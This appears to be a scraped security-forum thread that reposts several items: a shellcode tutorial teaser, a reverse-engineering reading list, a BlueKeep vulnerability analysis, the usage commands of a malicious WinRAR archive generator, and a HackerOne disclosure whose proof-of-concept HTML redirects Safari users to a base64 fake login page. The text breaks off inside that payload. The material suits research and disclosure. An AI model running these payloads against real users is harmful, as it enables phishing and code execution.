Leaderboard

Writing shellcodes for Windows x64 On 30 June 2019 By nytrosecurity Long time ago I wrote three detailed blog posts about how to write shellcodes for Windows (x86 – 32 bits). The articles are beginner friendly and contain a lot of details. First part explains what is a shellcode and which are its limitations, second part explains PEB (Process Environment Block), PE (Portable Executable) file format and the basics of ASM (Assembler) and the third part shows how a Windows shellcode can be actually implemented. This blog post is the port of the previous articles on Windows 64 bits (x64) and it will not cover all the details explained in the previous blog posts, so who is not familiar with all the concepts of shellcode development on Windows must see them before going further. Of course, the differences between x86 and x64 shellcode development on Windows, including ASM, will be covered here. However, since I already write some details about Windows 64 bits on the Stack Based Buffer Overflows on x64 (Windows) blog post, I will just copy and paste them here. As in the previous blog posts, we will create a simple shellcode that swaps the mouse buttons using SwapMouseButton function exported by user32.dll and grecefully close the proccess using ExitProcess function exported by kernel32.dll. Articol complet: https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/

Stiam de pavel yosifovich din referinte: https://www.pluralsight.com/authors/pavel-yosifovich Smecher omul.

Digital Security Company Blog Information Security Reverse engineering dukebarman August 15, 2017 Favorites: reverse engineering links Sursa: https://m.habr.com/ru/company/dsec/blog/334832/ Hello! Today we would like to share our list of materials on reverse engineering (RE). This list is very extensive, because our research department is primarily concerned with the tasks of RE. In our opinion, the selection of materials on the topic is good for the start, while it may be relevant for a long time. We have been sending this list of links, resources, books for five years to people who would like to get into our research department, but they don’t yet pass by the level of knowledge or just begin their way in the field of information security. Naturally, this list, like most materials / selections, will need updating and updating in some time. Funny fact: we were shown how some companies send out our list of materials from themselves, but only in a very old edition. And after this publication, they will finally be able to use its updated version with a clear conscience;) So, let's go to the list of materials! Topics a. Reverse b. Search for vulnerabilities (fuzzing) c. Exploiting Vulnerabilities d. Malware Analysis Tools a. IDA Pro b. Radare2 c. WinDBG (Ollydbg / Immunity Debugger / x64dbg) d. GDB e. DBI f. SMT g. Python to automate h. BAF (Binary Analysis Frameworks) Architecture a. x86-x86_64 b. ARM OS a. Windows b. Linux c. Mac OS (OSX) / iOS d. Android File Formats a. PE b. ELF c. Mach-o Programming a. C / C ++ b. Assembler Practice a. War games 1. Topics In this section, we will look at the main areas of RE application. Let's start directly from the reverse development process itself, move on to finding vulnerabilities and developing exploits, and, of course, let's get to malware analysis. 1.a Reverse engineering Chris Kaspersky’s “The Art of Disassembling” is not new, but a very good and still up-to-date book from Chris with a good systematization of knowledge and excellent material; " Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation " - a "new" book from several well-known information security specialists covering some new issues and themes that are missing from Chris's book; " Reversal for Beginners " by Denis Yuryevich is a completely free book, already translated into many languages of the world. Here, probably, the most remarkable thing is the presence of interesting tasks after each chapter, while for several architectures at once; " Practical RE tips " - an excellent webinar in English from Gynvael Coldwind, containing many useful tips and scripts about RE; The resource "OPENSECURITYTRAINING.INFO " contains good educational lectures and videos on RE in English; " Digging Through the Firmware " is a good series of Practical Reverse Engineering articles - useful articles for those who are just about to dive into the world of device firmware reversal; " Training: Security of BIOS / UEFI System Firmware from Attacker and Defender Perspectives " - if you want to dive into the world of firmware security, UEFI BIOS, then you definitely need to familiarize yourself with these slides that were previously in paid training at leading security conferences; CRYPTO101 - a little introduction to cryptography, without which it can not do. 1.b Vulnerability Scan " Fuzzing: Brute Force Vulnerability Discovery" - although not a new book, it’s just right for understanding the basics of fuzzing. There is a translation into Russian, but it contains rather funny blunders; " Automatic search for vulnerabilities in programs without source texts " - a good introductory material in Russian, presented at PHDays 2011; " The Evolving Art of Fuzzing " - an article about the development of fuzzing; " Modern Security Vulnerability Discovery " - a compilation of different techniques for finding vulnerabilities in one document; " (State of) The Art of War: Offensive Techniques in Binary Analysis " - an all-in-one document on all existing vulnerability scan techniques; " The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities " is far from a new, but still relevant, book on different approaches to finding vulnerabilities. 1.c Examples of exploiting found vulnerabilities " Exploit Writing Tutorials by Corelan Team " ( translation ) - a famous series of posts on writing exploits and shellcodes, starting with the basics; " Exploit Development Community " ( partial translation ) - a series of articles on writing a combat exploit for IE 10 and 11 versions; " Modern Binary Exploitation " - materials from the RPISEC team from the training course they conducted at the Rensselaer Polytechnic Institute; " Web-archive of the blog company Vupen " - submerged blog with examples of exploiting complex vulnerabilities in VirualBox, XEN, Firefox, IE10, Windows Kernel, Adobe Flash, Adobe Reader; " Project Zero " - a blog from the research team of Google, where their experts often share interesting stories on the exploitation of various cool vulnerabilities; " Browser mitigations against memory corruption vulnerabilities " - protection technologies used in popular browsers: " Browsers and app specific security mitigation. Part 1 " " Browsers and app specific security mitigation. Part 2. Internet Explorer and Edge " " Browsers and app specific security mitigation. Part 3. Google Chrome " " SoK: Eternal War in Memory " is an excellent document that shows the attack model and describes various mechanisms to prevent exploitation at different stages for different types of vulnerabilities associated with memory corruption; " Writing Exploits for Win32 Systems from Scratch " - a detailed article on writing an exploit from scratch for a vulnerability in the SLMAIL program; Phrack - the famous hacker magazine Phrack. We recommend reading, first of all, the articles of the category "The Art of Exploitation"; " The Shellcoder's Handbook: Discovering and Exploiting Security Holes " is a legendary book on shellcode writing. 1.d Malware Analysis " Practical Malware Labs " - source for the book " Practical Malware Analysis "; " Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code " - we recommend this and the previous book with one set to those interested in this topic; " Malware Analysis Tutorials: a Reverse Engineering Approach " ( translation ) is a rather long series of articles devoted to setting up an environment with subsequent analysis of malware in it; " Course materials for Malware Analysis by RPISEC " - another course from RPISEC, only now about malware; " Computer viruses and antiviruses. Programmer's view " - even though the book examines malicious programs starting from the DOS times, it will still be useful, because besides analyzing the code of such programs, the author shows examples of writing antiviruses for each specific case. 2. Necessary tools Below are the popular tools used in RE. 2.a IDA Pro " The IDA Pro Book: The Unofficial Guide to the World Popular Disassembler " is a book that will make your acquaintance with IDA Pro easy and relaxed " TiGa's Video Tutorial Series on IDA Pro " - a selection of small HOW-TO videos using IDA Pro; " Open Analysis Live " - in contrast to the previous selection on the use of IDA Pro, this newer and more updated. Mostly, malware analysis is considered. 2.b Radare2 " The radare2 book " - the main book on the use of the Radare2 framework for reverse; " Radare2 Cheatsheet " - "cheat sheet" for the main teams; " Radare Today - the blog of radare2 " - framework blog. There are not only news, but also practical examples. 2.c WinDBG (Ollydbg / Immunity Debugger / x64dbg) Without knowledge of the principles of the debugger and the ability to use it, too, can not do. Below we look at debuggers for Windows OS, and in the next paragraph we will focus on the famous GDB. So, let's go: Advanced Windows Debugging: Developing and Administering Reliable, Robust, and Secure Software - first of all, this book is useful for understanding and “catching” errors like heap damage; " Inside Windows Debugging: A Practical Guide to Debugging and Tracing Strategies in Windows " - this edition will well complement the previous book; “An introduction to cracking from scratch using OllyDbg” - unfortunately, the oldest resource wasm.ru was closed, but such a compilation is easily searched because it has been duplicated into many resources. In addition, "forks" began to appear on the network, only they are already using x64dbg or IDA. 2.d gdb " gdb Debugging Full Example (Tutorial): ncurses " - a guide for using GDB; " GEF - GDB Multi-Architecture Enhanced Features for Exploiters & Reverse-Engineers" - add-on GDB over the Python language, adds many useful new commands that will be useful for developing exploits; " GEF Tutorials " is a series of screencasts on using GEF. 2.e DBI Programmable debugging is today an indispensable approach in the arsenal of any reverser. And DBI is one of the tools. More details: " Dynamic Binary Instrumentation inInformation Security " - this article has already collected some generalized information about DBI; " Light And Dark Side Of Code Instrumentation " - this presentation will help you navigate in the varieties of various code tools and in what and when you can help with the analysis of programs. 2.f SMT What is the SMT solver? In short, an SMT solver is a program that can solve logical formulas. The basic idea of using SMT in the field of software security is to translate a program code or algorithm into a logical formula, and then use a SMT solver to test one or another property of this code. In other words, SMT provides a mathematical tool for semantic code analysis. SMT solvers have been used in our field for quite some time. They are well established for the following tasks: search bugs (static analysis / fuzzing); deobfuscation; "home" cryptanalysis; character execution (as an "engine"); There are also some successes in the field of automatic exploit generation (for example, ROP generation). During this time, SMT lost the aura of mystery, more or less working tools for “ordinary” people appeared. Below are sources that will help to plunge into the topic: " SMT Solvers for Software Security, Sean Heelan, Rolf Rolles " - perhaps the first scientific work in which the application of SMT was proposed for solving software security problems. It gives an idea of where and how SMT can find its place in this area; Z3 is one of the most popular and effective SMT solvers; Z3 wiki - project repository; " Getting Started with Z3: A Guide " - online tutorial, SMT-solver for experiments; Z3Py - binding in Python for Z3; " Experimenting with Z3 - Dead code elimination "; " Experimenting with Z3 - Proving opaque predicates "; " Theorem prover, symbolic execution and practical reverse-engineering " - a good overview presentation, with examples of solving real-world problems and using Z3Py; " Quick introduction into SAT / SMT solvers and symbolic execution " ( Russian version ) is a good book with interesting practical examples. " An introduction to the use of SMT solvers " - review material. 2.g Python for Automation Today, without basic knowledge of Python, it will be very difficult, because this programming language is considered the most popular means for automating various tasks in the field of information security (and not only). In addition, it is used in various utilities (for example, all the above utilities allow you to complement the functionality with the help of this PL): " Gray Hat Python " ( translation ) is a great book that tells you how useful Python is in reverse; " The Beginner's Guide to IDAPython " - a free book on IDAPython; " Python Arsenal for Reverse Engineering " is a resource dedicated to various utilities and libraries for reverse engineering using Python. 2.h BAF (Binary Analysis Frameworks) For a bit more advanced, we recommend paying attention to whole frameworks, which in their composition use the previously mentioned mechanisms and analysis tools for solving more complex problems. So, here they are: " Overview and Usage of Binary Analysis Frameworks " - a small overview of BAF; Some interesting frameworks / tools: Triton Developer Use Examples " Dynamic Binary Analysis and Obfuscated Codes " How can Triton help virtual machine based software protections Angr Solving kao's toy project with symbolic execution and angr Ponce Binary Analysis Platform . 3. Architecture We will cover only a few popular architectures.At the end of the article in the section with additional materials you will find information on many others (MIPS, PowerPC, etc.). 3.a x86-x86_64 " Intel 64 and IA-32 Architectures Software Developer Developers " - previously, such manuals were sent by mail, but because of the large amount of material in them, printing became expensive. Recommended as a desktop reference. 3.b ARM Azeria Labs (ARM Assembly Basics & ARM Exploit Development) - a site with articles on the basics of ARM-assembler and the development of exploits for this architecture; The course " Introduction to ARM " - a two-day video course on ARM-development and operation; VisUAL - visualization of the work of ARM-commands. 4. OS Knowledge of the principles of work of popular Operating Systems. 4.a Windows " Windows Internals " - the fundamental book for understanding the work of Windows. The following items, although mainly related to the exploitation of vulnerabilities in this OS, but allow you to learn more about the insides of Windows: " Windows exploits, mostly precompiled " " Exploit Development Environment " " Windows Breakout from Defcon24 " " Part 10: Kernel Exploitation -> Stack Overflow " " Kernel and Driver explotation ". 4.b linux " Linux insides " is an analogue of the book Windows Internals, but only for OS such as Linux. As in the case of Windows, the following topics are related to the development of exploits: " Heap Exploitation into Linux " " A series of tutorial for linux exploit development to newbie " " Linux Kernel Exploitation " " Programming Linux Anti-Reversing Techniques " 4.c Mac OS (OSX) / iOS " Reverse Engineering Resources Mac and iOS " - a selection of materials on this topic. 4.d Android " Android Hacker's Handbook " - probably the most popular book dedicated to the safety of the Android OS; " Android Internals :: Power User's View " - a book that tells about the internal mechanisms of this OS. Due to recent leaks, the material appeared in the public domain, about which the author himself writes on his website and provides an opportunity to download the previous version. 5. Executable file formats This section provides links explaining the details of popular executable file formats. 5.a PE " PE sections "; " PE Title "; " Windows executable file format. PE32 and PE64 "; " Computer viruses inside and out ." 5.b ELF " Linux x64 Infection for Lamers (by a Lamer)." 5.c mach-o " Parsing mach-o files " The famous researcher corkami makes very useful and interesting "posters" with the scheme of various file formats, including those mentioned above. We recommend using them as a cheat sheet. A utility Kaitai Sctruct will help in the analysis. 6. Programming One of our friends once said that a good reverser is 80% a good programmer. The ability to program and understand what is being done and why simplifies the process of researching someone else's program. Therefore, without programming in the reverse nowhere. And of course, the automation of routine tasks, as you probably already understood, is a very useful thing;) 6.a C / C ++ Modern Memory Safety: C / C ++ Vulnerability Discovery, Exploitation, Hardening is a great course with excellent examples. Just must have stuff for everyone. 6.b ASM " A Crash Course in x86 Assembly for Reverse Engineers " - an "accelerated course" for diving in x86 Assembler, positioned as special for RE; " Assembly Programming Tutorial " - assembly programming manual, with the ability to run examples online as you study; " Assembler. 2nd edition " - it is recommended to use as a reference; " x86 Assembly Guide " - online version. 7. Practice This section provides links to virtual machines and online resources to practice. 7.a War Games SmashTheStack Wargaming Network - this multi-wargame network is maintained by volunteers and is available online. We recommend starting with it; BinTut - local wargame; Reversing Workshop - a master class on solving tasks from the annual competition "The Flare On Challenge" for 2016; Exploit-Challenges - a selection of vulnerable ARM binary files; ARM Reverse Engineering Exercises - the original repository "disappeared", but one of the forks was found on the github expanses; CTF Time - here you can find out the schedule of future CTF-events and read the solutions of the past. And finally, a few links with a large number of materials on the above topics: Selection, generally devoted to the field of information security Pro exploitation of vulnerabilities About reverse engineering: Awesome-reversing REMath Resource Overview About the exploitation of vulnerabilities in Windows About phasing Malware Analysis And many more different " awesome " collections. +35 37115 +35 38.3k371 27 Karma 0 Rating Boris Ryutin @dukebarman Security researcher 13 subscribers Share publication Comments 15 RELATED PUBLICATIONS August 24, 2015 SCADA and mobile phones: safety assessment of applications that turn a smartphone into a plant control panel March 17, 2015 JavaScript and Reverse Engineering Contact Points October 31, 2013 Favorites: IT Security Links POPULAR PER DAY yesterday at 10:10 Akihabara: Otaku nesting site yesterday at 14:22 GandCrab authors stop working: they claim they stole enough yesterday at 14:24 How we made a safe deal for freelance: give a choice, cut features, compare commissions yesterday at 13:05 Where are your constants stored on a CortexM microcontroller (using the C ++ IAR compiler as an example) yesterday at 12:18 Pointers in Python: what’s the point? Language settings Full version 2006-2019 © « TM »

#HITB2019AMS PRECONF PREVIEW - The End Is The Beginning Is The End: Ten Years In The NL Box Hack In The Box Security Conference #HITB2019AMS PRECONF PREVIEW - The Beginning of the End? A Return to the Abyss for a Quick Look Hack In The Box Security Conference #HITB2019AMS KEYNOTE: The End Is The Beginning Is The End: Ten Years In The NL Box - D. Kannabhiran Hack In The Box Security Conference #HITB2019AMS D1T1 - Make ARM Shellcode Great Again - Saumil Shah Hack In The Box Security Conference #HITB2019AMS D1T2 - Hourglass Fuzz: A Quick Bug Hunting Method - M. Li, T. Han, L. Jiang and L. Wu Hack In The Box Security Conference #HITB2019AMS D1T1 - TOCTOU Attacks Against Secure Boot And BootGuard - Trammell Hudson & Peter Bosch Hack In The Box Security Conference #HITB2019AMS D1T2 - Hidden Agendas: Bypassing GSMA Recommendations On SS7 Networks - Kirill Puzankov Hack In The Box Security Conference #HITB2019AMS D1T1 - Finding Vulnerabilities In iOS/MacOS Networking Code - Kevin Backhouse Hack In The Box Security Conference #HITB2019AMS D1T2 - fn_fuzzy: Fast Multiple Binary Diffing Triage With IDA - Takahiro Haruyama Hack In The Box Security Conference #HITB2019AMS D1T3 - How To Dump, Parse, And Analyze i.MX Flash Memory Chips - Damien Cauquil Hack In The Box Security Conference #HITB2019AMS D1T1 - The Birdman: Hacking Cospas-Sarsat Satellites - Hao Jingli Hack In The Box Security Conference #HITB2019AMS D1T2 - Duplicating Black Box Machine Learning Models - Rewanth Cool and Nikhil Joshi Hack In The Box Security Conference #HITB2019AMS D1T3 - Overcoming Fear: Reversing With Radare2 - Arnau Gamez Montolio Hack In The Box Security Conference #HITB2019AMS D1T1 - Deobfuscate UEFI/BIOS Malware And Virtualized Packers - Alexandre Borges Hack In The Box Security Conference #HITB2019AMS D1T2 - Researching New Attack Interfaces On iOS And OSX - Lilang Wu and Moony Li Hack In The Box Security Conference #HITB2019AMS D1T1 - A Successful Mess Between Hardening And Mitigation - Weichselbaum & Spagnuolo Hack In The Box Security Conference #HITB2019AMS D1T2 - For The Win: The Art Of The Windows Kernel Fuzzing - Guangming Liu Hack In The Box Security Conference #HITB2019AMS D1T3 - Attacking GSM - Alarms, Smart Homes, Smart Watches And More - Alex Kolchanov Hack In The Box Security Conference #HITB2019AMS D1T1 - SeasCoASA: Exploiting A Small Leak In A Great Ship - Kaiyi Xu and Lily Tang Hack In The Box Security Conference #HITB2019AMS D1T2 - H(ack)DMI: Pwning HDMI For Fun And Profit - Jeonghoon Shin and Changhyeon Moon Hack In The Box Security Conference #HITB2019AMS D1T1 - Pwning Centrally-Controlled Smart Homes - Sanghyun Park and Seongjoon Cho Hack In The Box Security Conference #HITB2019AMS D1T2 - Automated Discovery Of Logical Priv. Esc. Bugs In Win10 - Wenxu Wu and Shi Qin Hack In The Box Security Conference Sursa:

Analysis of CVE-2019-0708 (BlueKeep) By : MalwareTech May 31, 2019 I held back this write-up until a proof of concept (PoC) was publicly available, as not to cause any harm. Now that there are multiple denial-of-service PoC on github, I’m posting my analysis. Binary Diffing As always, I started with a BinDiff of the binaries modified by the patch (in this case there is only one: TermDD.sys). Below we can see the results. A BinDiff of TermDD.sys pre and post patch. Most of the changes turned out to be pretty mundane, except for “_IcaBindVirtualChannels” and “_IcaRebindVirtualChannels”. Both functions contained the same change, so I focused on the former as bind would likely occur before rebinding. Original IcaBindVirtualChannels is on the left, the patched version is on the right. New logic has been added, changing how _IcaBindChannel is called. If the compared string is equal to “MS_T120”, then parameter three of _IcaBindChannel is set to the 31. Based on the fact the change only takes place if v4+88 is “MS_T120”, we can assume that to trigger the bug this condition must be true. So, my first question is: what is “v4+88”?. Looking at the logic inside IcaFindChannelByName, i quickly found my answer. Inside of IcaFindChannelByName Using advanced knowledge of the English language, we can decipher that IcaFindChannelByName finds a channel, by its name. The function seems to iterate the channel table, looking for a specific channel. On line 17 there is a string comparison between a3 and v6+88, which returns v6 if both strings are equal. Therefore, we can assume a3 is the channel name to find, v6 is the channel structure, and v6+88 is the channel name within the channel structure. Using all of the above, I came to the conclusion that “MS_T120” is the name of a channel. Next I needed to figure out how to call this function, and how to set the channel name to MS_T120. I set a breakpoint on IcaBindVirtualChannels, right where IcaFindChannelByName is called. Afterwards, I connected to RDP with a legitimate RDP client. Each time the breakpoint triggered, I inspecting the channel name and call stack. The callstack and channel name upon the first call to IcaBindVirtualChannels The very first call to IcaBindVirtualChannels is for the channel i want, MS_T120. The subsequent channel names are “CTXTW “, “rdpdr”, “rdpsnd”, and “drdynvc”. Unfortunately, the vulnerable code path is only reached if FindChannelByName succeeds (i.e. the channel already exists). In this case, the function fails and leads to the MS_T120 channel being created. To trigger the bug, i’d need to call IcaBindVirtualChannels a second time with MS_T120 as the channel name. So my task now was to figure out how to call IcaBindVirtualChannels. In the call stack is IcaStackConnectionAccept, so the channel is likely created upon connect. Just need to find a way to open arbitrary channels post-connect… Maybe sniffing a legitimate RDP connection would provide some insight. A capture of the RDP connection sequence The channel array, as seen by WireShark RDP parser The second packet sent contains four of the six channel names I saw passed to IcaBindVirtualChannels (missing MS_T120 and CTXTW). The channels are opened in the order they appear in the packet, so I think this is just what I need. Seeing as MS_T120 and CTXTW are not specified anywhere, but opened prior to the rest of the channels, I guess they must be opened automatically. Now, I wonder what happens if I implement the protocol, then add MS_T120 to the array of channels. After moving my breakpoint to some code only hit if FindChannelByName succeeds, I ran my test. Breakpoint is hit after adding MS_T120 to the channel array Awesome! Now the vulnerable code path is hit, I just need to figure out what can be done… To learn more about what the channel does, I decided to find what created it. I set a breakpoint on IcaCreateChannel, then started a new RDP connection. The call stack when the IcaCreateChannel breakpoint is hit Following the call stack downwards, we can see the transition from user to kernel mode at ntdll!NtCreateFile. Ntdll just provides a thunk for the kernel, so that’s not of interest. Below is the ICAAPI, which is the user mode counterpart of TermDD.sys. The call starts out in ICAAPI at IcaChannelOpen, so this is probably the user mode equivalent of IcaCreateChannel. Due to the fact IcaOpenChannel is a generic function used for opening all channels, we’ll go down another level to rdpwsx!MCSCreateDomain. The code for rdpwsx!MCSCreateDomain This function is really promising for a couple of reasons: Firstly, it calls IcaChannelOpen with the hard coded name “MS_T120”. Secondly, it creates an IoCompletionPort with the returned channel handle (Completion Ports are used for asynchronous I/O). The variable named “CompletionPort” is the completion port handle. By looking at xrefs to the handle, we can probably find the function which handles I/O to the port. All references to “CompletionPort” Well, MCSInitialize is probably a good place to start. Initialization code is always a good place to start. The code contained within MCSInitialize Ok, so a thread is created for the completion port, and the entrypoint is IoThreadFunc. Let’s look there. The completion port message handler GetQueuedCompletionStatus is used to retrieve data sent to a completion port (i.e. the channel). If data is successfully received, it’s passed to MCSPortData. To confirm my understanding, I wrote a basic RDP client with the capability of sending data on RDP channels. I opened the MS_T120 channel, using the method previously explained. Once opened, I set a breakpoint on MCSPortData; then, I sent the string “MalwareTech” to the channel. Breakpoint hit on MCSPortData once data is sent the the channel. So that confirms it, I can read/write to the MS_T120 channel. Now, let’s look at what MCSPortData does with the channel data… MCSPortData buffer handling code ReadFile tells us the data buffer starts at channel_ptr+116. Near the top of the function is a check performed on chanel_ptr+120 (offset 4 into the data buffer). If the dword is set to 2, then the function calls HandleDisconnectProviderIndication and MCSCloseChannel. Well, that’s interesting. The code looks like some kind of handler to deal with channel connects/disconnect events. After looking into what would normally trigger this function, I realized MS_T120 is an internal channel and not normally exposed externally. I don’t think we’re supposed to be here… Being a little curious, i sent the data required to trigger the call to MCSChannelClose. Surely prematurely closing an internal channel couldn’t lead to any issues, could it? Oh, no. We crashed the kernel! Whoops! Let’s take a look at the bugcheck to get a better idea of what happened. It seems that when my client disconnected, the system tried to close the MS_T120 channel, which I’d already closed (leading to a double free). Due to some mitigations added in Windows Vista, double-free vulnerabilities are often difficult to exploit. However, there is something better. Internals of the channel cleanup code run when the connection is broken Internally, the system creates the MS_T120 channel and binds it with ID 31. However, when it is bound using the vulnerable IcaBindVirtualChannels code, it is bound with another id. The difference in code pre and post patch Essentially, the MS_T120 channel gets bound twice (once internally, then once by us). Due to the fact the channel is bound under two different ids, we get two separate references to it. When one reference is used to close the channel, the reference is deleted, as is the channel; however, the other reference remains (known as a use-after-free). With the remaining reference, it is now possible to write kernel memory which no longer belongs to us. Sursa: https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html

Evil-WinRAR-Generator Generator of malicious Ace files for WinRAR < 5.70 beta 1 Vulnerability by research.checkpoint.com Developed by @manulqwerty - IronHackers. Usage Help: ./evilWinRAR.py -h Generate a malicius archive: ./evilWinRAR.py -o evil.rar -e calc.exe Evil-WinRAR-Generator works out of the box with Python version 3.x on any platform. Proof of Concept (CVE-2018-20250) Screenshots Credits https://github.com/droe/acefile https://github.com/WyAtu/CVE-2018-20250 Source

Client-Side Race Condition using Marketo, allows sending user to data-protocol in Safari when form without onSuccess is submitted on www.hackerone.com fransrosen submitted a report to HackerOne. Jul 14th (9 months ago) Hi, I made a talk earlier this month about Client-Side Race Conditions for postMessage on AppSecEU: https://speakerdeck.com/fransrosen/owasp-appseceu-2018-attacking-modern-web-technologies In this talk I mention some fun ways to race postMessages from a malicious origin before the legit source sends it. Background As you remember from #207042 you use Marketo for your form-submissions on www.hackerone.com. Now, back then, I abused the fact that no origin was checked on the receiving end of marketo.com. By doing this I was then able to steal the data being submitted. Technical Description In this case however, I noticed that as soon as you submit a form, one of the listener being on www.hackerone.com will pass the content forward to a handler for the specific form that was loaded. As soon as it finds the form that was initiated and submitted, it will either run the error or success-function based on the content of the postMessage. If the message is a success, it will run any form.onSuccess being defined when the form was loaded. You can see some of these in this file: https://www.hackerone.com/sites/default/files/js/js_pdV-E7sfuhFWSyRH44H1WwxQ_J7NeE2bU6XNDJ8w1ak.js form.onSuccess(function() { return false; }); If the onSuccess returns false nothing more will happen. However, if the onSuccess doesn't exist or returns true, the parameter called followUpUrl will instead be sent to location.href. There is no check whatsoever what this URL contains. The code does parse the URL and if a parameter called aliId is set it will append it to the URL. As you might now, the flow of the Marketo-solution looks like this: Form is initiated by loading a JS-file from Marketo. Form shows up on www.hackerone.com Form is submitted. Listener is now initiated on www.hackerone.com Message is sent to Marketo from www.hackerone.com using postMessage Marketo gets the message and runs an ajax call to save it on Marketo When successful, a postMessage is sent from Marketo back to www.hackerone.com with the status. The listener catches the response and checks onSuccess. If onSuccess gives false, don't do anything. If it doesn't exists or returns true, follow the followUpUrl. Exploitation Since no origin check is made on the listener initated in #3, we can from our end try to race the message between #3 and #6. If our message comes through we can direct the user to whatever location we like if we find a form that doesn't utilize onSuccess. Forms on www.hackerone.com Looking at the forms, we can see that one being initiated called mktoForm_1013 does not have any onSuccess-function on it. This means that we can now use the followUpUrl from the postMessage to send the user to our location. We can also see in the URL of your JS-code above that the following URLs contains mktoForm_1013: if (location.pathname == "/product/response") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to get up and running with HackerOne Response? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/bounty") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to tap into the ultimate level of hacker-powered security with HackerOne Bounty? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/challenge") { $('#mktoForm_1013 .mktoHtmlText p').text('Up for a HackerOne Challenge? Want to learn more? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/services") { $('#mktoForm_1013 .mktoHtmlText p').text("We're looking forward to serving you. Give us a few details and we’ll be in touch shortly!"); } else if (location.pathname == "/") { $('#mktoForm_1013 .mktoHtmlText p').text("Start uncovering critical vulnerabilities today. Give us a few details and we’ll be in touch shortly!"); } And as before in the old report, we know that #contact as the fragment will open the form directly without interaction. CSP Due to your CSP, we cannot send the user to javascript:. If your CSP would have allowed it, we would have a proper XSS on www.hackerone.com. Chrome and Firefox also disallows sending the user to a data:-URL. We can send the user to any location we like, but that's no fun. ...but... ...enter Safari. Safari does not restrict top-navigation to data: (tested in macOS 10.13.5, Safari 11.1.1). This means that we can do the following: Have a malicious page opening https://www.hackerone.com/product/response#contact Make it send a bunch of messages saying the form as successfully submitted. When the victim fills in the form and submits, our message will hopefully win, since Marketo needs to both get the postMessage and send an ajax call to save the response until it sends a legit response. We redirect the user to a very good-looking sign-in page for HackerOne. ??? PROFIT!!! PoC When trying this attack I noticed that if Safari opens www.hackerone.com in a new tab instead of a new window, Safari counts the tab as inactive and will slow down the sending of postMessages to the current frame. However, if you open www.hackerone.com in a complete new window, using window.open(url,'','_blank'), Safari will not count the old window as inactive and the messages will be sent just as fast which will significantly increase our chance of winning the race. The following HTML should show you my PoC in Safari: <html> <head> <script> var b; function doit() { setInterval(function() { b.postMessage('{"mktoResponse":{"for":"mktoFormMessage0","error":false,"data":{"formId":"1013","followUpUrl":"data:text/html;base64,PGhlYWQ+PGxpbmsgcmVsPXN0eWxlc2hlZXQgbWVkaWE9YWxsIGhyZWY9aHR0cHM6Ly9oYWNrZXJvbmUuY29tL2Fzc2V0cy9mcm9udGVuZC4wMjAwMjhlOTU1YTg5Zjg1YTVmYzUyMWVhYzMxMDM2OC5jc3MgLz48bGluayByZWw9c3R5bGVzaGVldCBtZWRpYT1hbGwgaHJlZj1odHRwczovL2hhY2tlcm9uZS5jb20vYXNzZXRzL3ZlbmRvci1iZmRlMjkzYTUwOTEzYTA5NWQ4Y2RlOTcwZWE1YzFlNGEzNTI0M2NjNzY3NWI2Mjg2YTJmM2Y3MDI2ZmY1ZTEwLmNzcz48L2hlYWQ+PGJvZHk+PGRpdiBjbGFzcz0iYWxlcnRzIj4KPC9kaXY+PGRpdiBjbGFzcz0ianMtYXBwbGljYXRpb24tcm9vdCBmdWxsLXNpemUiPjxzcGFuIGRhdGEtcmVhY3Ryb290PSIiPjxkaXYgY2xhc3M9ImZ1bGwtc2l6ZSBhcHBsaWNhdGlvbl9mdWxsX3dpZHRoX2xheW91dCI+PGRpdj48ZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zaWduZWQtb3V0Ij48ZGl2IGNsYXNzPSJpbm5lci1jb250YWluZXIiPjxkaXY+PGEgY2xhc3M9ImFwcF9fbG9nbyIgaHJlZj0iLyI+PGltZyBzcmM9Imh0dHBzOi8vaGFja2Vyb25lLmNvbS9hc3NldHMvc3RhdGljL2ludmVydGVkX2xvZ28tYzA0MzBhZjgucG5nIiBhbHQ9IkhhY2tlck9uZSI+PC9hPjxkaXYgY2xhc3M9InRvcGJhci10b2dnbGUiPjxpIGNsYXNzPSJpY29uLWhhbWJ1cmdlciI+PC9pPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWJuYXYtd3JhcHBlciI+PHVsIGNsYXNzPSJ0b3BiYXItc3VibmF2Ij48bGkgY2xhc3M9InRvcGJhci1zdWJuYXYtaXRlbSI+PGEgY2xhc3M9InRvcGJhci1zdWJuYXYtbGluayIgaHJlZj0iL3VzZXJzL3NpZ25faW4iPlNpZ24gSW48L2E+Jm5ic3A7fCZuYnNwOzwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItc3VibmF2LWl0ZW0iPjxhIGNsYXNzPSJ0b3BiYXItc3VibmF2LWxpbmsiIGhyZWY9Ii91c2Vycy9zaWduX3VwIj5TaWduIFVwPC9hPjwvbGk+PC91bD48L2Rpdj48ZGl2IGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi13cmFwcGVyIj48dWwgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uIj48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIj5Gb3IgQnVzaW5lc3M8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Rm9yIEhhY2tlcnM8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGF